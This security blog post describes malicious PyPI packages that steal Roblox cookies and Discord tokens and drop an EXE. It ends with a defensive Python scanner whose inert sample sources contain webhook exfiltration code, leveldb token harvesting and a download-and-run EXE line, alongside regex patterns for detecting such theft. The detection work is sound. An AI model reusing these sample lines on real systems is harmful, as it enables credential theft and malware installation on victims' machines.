Over the past few years, Sonatype has consistently been on top of discovering malicious packages infiltrating open source ecosystems like npm, PyPI, and GitHub. Among various examples, this has included Discord token and credit card stealers previously caught on the npm registry by our automated malware detection system, Nexus Firewall.

And, just last week, we reported that the PyPI repository had been flooded with more than 1,200 dependency confusion packages that served no functional purpose.

This week, our early warning systems have once again caught malicious PyPI packages that steal your Roblox security cookies and Discord tokens. The packages are accounted for in Sonatype's security data under sonatype-2022-0706 and sonatype-2022-0723, which describe them as:

- Discord token stealers, not a PoC for an "XSS" attack as the package claims
- Possible typosquat of a legitimate package
- Steals Discord token and leveldb files, runs a suspicious EXE

According to PePy stats, these packages have been retrieved a total of 3,916 times. This includes downloads from PyPI users and automated mirrors.

On discovering these packages this week, we rushed our findings to the PyPI security team, who have since removed the packages.

Roblox Security Cookie Stealer

As gaming platforms like Discord and Roblox have gained popularity and rapid adoption, threat actors continue to target users and developers of these platforms through techniques like typosquatting or brandjacking, as Sonatype has previously reported. However, the packages caught by us this time are of a quirky nature.

Starting with the PyPI package 'xss,' for example, we see it touts itself to be a "simple XSS toolkit."

For those unfamiliar with the term, Cross-Site Scripting (XSS) is a form of attack in which the bad actor delivers malicious code to the user's web browser via a web application. For example, a simple XSS attack would be you clicking on a link sent by the attacker; the link opens a legitimate website, but the injected script sends your session cookies for that website to the attacker.

Although the 'xss' package may appear to be an 'XSS toolkit' that security professionals and pen-testers could use to create XSS exploits, its contents don't quite convey that. My colleagues Cody Nash, who is part of the development team behind the automated malware detection system, and security researcher Juan Aguirre noticed that "xss" versions 0.0.7 and 0.0.8 look for your ROBLOSECURITY cookie and send it to the attacker via a Discord webhook.

The 'ROBLOSECURITY' cookie is a sensitive piece of information stored by Roblox in the logged-in user's web browser to track their session. The cookie should never be shared with anyone: an attacker who obtains your 'ROBLOSECURITY' cookie can potentially gain access to your account straight away, bypassing any two-step verification checks you have set up.

The second category of PyPI packages identified by us is Discord token stealers: 'easyfuncsys,' 'humanqueen' and 'humanqueenn.' All three packages contain identical code.

'Easyfuncsys,' with its vague description of "Sniping names," in particular appears to be a typosquat, given that a similarly named legitimate package called easyfunctions exists. The initial versions of 'easyfuncsys' peek inside your web browsers' local storage ('leveldb') files, a technique identical to what we have seen in previous attacks. Discord tokens found in these files are retrieved and sent to the attacker's webhook.

It isn't immediately clear what prompted the attacker to name the other two 'humanqueen' and 'humanqueenn.' But our review suggests that these two packages are used as a testing ground by the attacker, whose main goal is to have users install 'easyfuncsys.'

Later versions of 'easyfuncsys,' however, left us surprised, as these specifically targeted Windows users. These versions, upon installation, simply downloaded and ran a suspicious EXE on the victim's machine.

Users of Nexus Firewall can rest easy knowing that such malicious packages would automatically be blocked from reaching their development builds.
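As an added example that is not part of the original post and not Sonatype's, PyPI's or the malicious packages' code: a small static scan that flags the behaviours described above in Python package sources, namely posting to a Discord webhook, touching the ROBLOSECURITY cookie, reading browser 'leveldb' storage, and downloading then running an EXE. The indicator tags, the regexes and the three sample sources are all constructed for this example; the samples are inert strings that are never executed and are not the real packages' code.

```python
"""Static indicator scan over Python package sources.

Added example for this article; not Sonatype's, PyPI's or the malicious
packages' code. The regexes look for the behaviours the article describes:
posting to a Discord webhook, touching the ROBLOSECURITY cookie, reading
browser 'leveldb' storage, and downloading then running an EXE.
The tag names and the sample sources are constructed for the example.
"""
import re
from dataclasses import dataclass

# (tag, regex) pairs. Tags are labels made up for this example.
INDICATORS = (
    ("discord_webhook",
     re.compile(r"https?://(?:canary\.|ptb\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")),
    ("roblosecurity_cookie", re.compile(r"ROBLOSECURITY", re.IGNORECASE)),
    ("browser_leveldb",
     re.compile(r"Local\s*Storage[\\/]+leveldb|\.ldb\b", re.IGNORECASE)),
    ("exe_download",
     re.compile(r"(?:urlretrieve|urlopen|requests\.get)\([^)\n]*\.exe", re.IGNORECASE)),
    ("exe_execute",
     re.compile(r"(?:os\.startfile|os\.system|subprocess\.(?:Popen|run|call))\([^)\n]*\.exe",
                re.IGNORECASE)),
)


@dataclass(frozen=True)
class Finding:
    path: str
    tags: frozenset
    labels: tuple


def scan_source(text: str) -> set:
    """Return the set of indicator tags whose regex matches anywhere in the source."""
    return {tag for tag, rx in INDICATORS if rx.search(text)}


def classify(tags: set) -> list:
    """Combine indicators into the two behaviour classes the article describes."""
    labels = []
    exfil = "discord_webhook" in tags
    credentials = bool(tags & {"roblosecurity_cookie", "browser_leveldb"})
    if exfil and credentials:
        labels.append("credential stealer")   # cookie/token read plus webhook exfil
    if {"exe_download", "exe_execute"} <= tags:
        labels.append("dropper")              # fetches an EXE and runs it
    return labels


def scan_package(files: dict) -> dict:
    """Scan every source file of a package; files maps path -> source text."""
    report = {}
    for path, text in files.items():
        tags = scan_source(text)
        report[path] = Finding(path, frozenset(tags), tuple(classify(tags)))
    return report


# Constructed sample sources (inert strings, never executed; not the real packages' code).
SAMPLE_COOKIE_STEALER = r'''
import requests
WEBHOOK = "https://discord.com/api/webhooks/123456789012345678/AbCdEfGh_ijklMNOP-qrstuv"
cookie = read_browser_cookie(".ROBLOSECURITY")  # harvesting helper deliberately omitted
requests.post(WEBHOOK, json={"content": cookie})
'''

SAMPLE_TOKEN_DROPPER = r'''
import os, requests, urllib.request
WEBHOOK = "https://discordapp.com/api/webhooks/987654321098765432/xyz-TOKEN_abc"
ldb = os.path.expandvars(r"%APPDATA%\discord\Local Storage\leveldb")
for name in os.listdir(ldb):
    if name.endswith(".ldb"):
        requests.post(WEBHOOK, files={"f": open(os.path.join(ldb, name), "rb")})
urllib.request.urlretrieve("http://example.invalid/update.exe", r"C:\Users\Public\update.exe")
os.startfile(r"C:\Users\Public\update.exe")
'''

SAMPLE_BENIGN = r'''
def add(a, b):
    return a + b
'''

# Hypothetical package layout for the sample run.
SAMPLE_PACKAGE = {
    "pkg_a/__init__.py": SAMPLE_COOKIE_STEALER,
    "pkg_b/__init__.py": SAMPLE_TOKEN_DROPPER,
    "pkg_b/util.py": SAMPLE_BENIGN,
}

if __name__ == "__main__":
    for path, finding in scan_package(SAMPLE_PACKAGE).items():
        print(f"{path}: tags={sorted(finding.tags)} labels={list(finding.labels)}")
```

String matching of this kind gives triage leads, not verdicts: an obfuscated package will not contain these literals, and a legitimate Discord bot will contain a webhook URL, so a hit is a reason to read the package before it reaches a build, not proof on its own.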